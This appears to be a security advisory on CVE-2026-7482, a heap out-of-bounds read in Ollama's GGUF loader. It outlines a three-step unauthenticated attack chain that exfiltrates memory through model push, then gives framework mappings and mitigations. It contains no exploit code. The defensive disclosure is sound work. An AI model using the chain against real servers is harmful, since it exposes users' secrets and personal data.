Overview
A critical vulnerability dubbed Bleeding Llama (CVE-2026-7482, CVSS 9.3) has been disclosed in Ollama, the widely used open-source framework for running large language models locally and in self-hosted environments. Discovered by Cyera, the flaw allows a remote, unauthenticated attacker to read sensitive data from the server’s heap memory — including prompts, chat history, environment variables, API keys, and secrets — and exfiltrate it to an attacker-controlled server. With an estimated 300,000 Ollama instances exposed on the public internet and no authentication enabled by default, the practical blast radius of this vulnerability is immediate and severe.
Technical Analysis
The vulnerability resides in Ollama’s GGUF model loader, the component responsible for ingesting model files in the GGUF format. The flaw is a classic heap out-of-bounds read: an attacker supplies a maliciously crafted GGUF file in which a tensor’s declared offset and size exceed the actual file length. When Ollama processes this file, it reads beyond the allocated heap buffer, accessing adjacent memory regions that may contain live runtime data.
The attack chain requires only three unauthenticated API calls:
- Upload a crafted GGUF file via Ollama’s model import API.
- Trigger processing of the file, causing the out-of-bounds read and capturing heap data into the resulting model blob.
- Exfiltrate the blob using Ollama’s built-in
model pushfeature, sending the memory-laced file to an attacker-controlled registry server.
Because Ollama listens on all network interfaces by default and ships without any authentication mechanism, every internet-accessible instance is exploitable without credentials. The memory regions exposed can include:
- LLM prompt and message history
- Environment variables (e.g.,
OPENAI_API_KEY, cloud provider tokens) - PHI, PII, and development secrets routed through the inference engine
Framework Mapping
| Framework | Technique/Category | Rationale |
|---|---|---|
| MITRE ATLAS | AML.T0040 – ML Model Inference API Access | Attacker abuses Ollama’s unauthenticated API to trigger the vulnerable code path |
| MITRE ATLAS | AML.T0057 – LLM Data Leakage | Heap memory containing prompts and secrets is exfiltrated |
| MITRE ATLAS | AML.T0043 – Craft Adversarial Data | Maliciously crafted GGUF file is the attack vehicle |
| OWASP LLM | LLM06 – Sensitive Information Disclosure | Primary impact: API keys, PII, and prompts leaked from runtime memory |
| OWASP LLM | LLM05 – Supply Chain Vulnerabilities | GGUF model ingestion pipeline is the exploited trust boundary |
Impact Assessment
The vulnerability affects all Ollama deployments prior to version 0.17.1 that are network-accessible without a firewall or authentication layer. The 300,000 figure represents publicly internet-facing instances; enterprise deployments on internal networks without segmentation are also at risk from insider threats or lateral movement. Depending on how Ollama is integrated, exploitation could expose:
- Enterprise AI workflows: Employee chat history and routed tool outputs
- Development environments: Hardcoded secrets and dev-time API tokens
- Healthcare and legal contexts: PHI and PII passed through prompts
- Multi-tenant platforms: Cross-tenant data leakage if Ollama is shared
Mitigation & Recommendations
- Upgrade immediately to Ollama version 0.17.1, which patches CVE-2026-7482.
- Restrict network access: Firewall Ollama’s API port (default: 11434) to localhost or trusted internal CIDRs only.
- Deploy an authentication proxy (e.g., OAuth2 Proxy, nginx with mTLS) in front of any network-accessible Ollama instance.
- Rotate all secrets: Assume any API keys, tokens, or credentials handled by an exposed Ollama instance are compromised.
- Audit GGUF ingestion pipelines: Validate model file sources and apply integrity checks before loading third-party GGUF files.
- Monitor for anomalous
model pushactivity: Alert on outbound model push calls to unknown registries.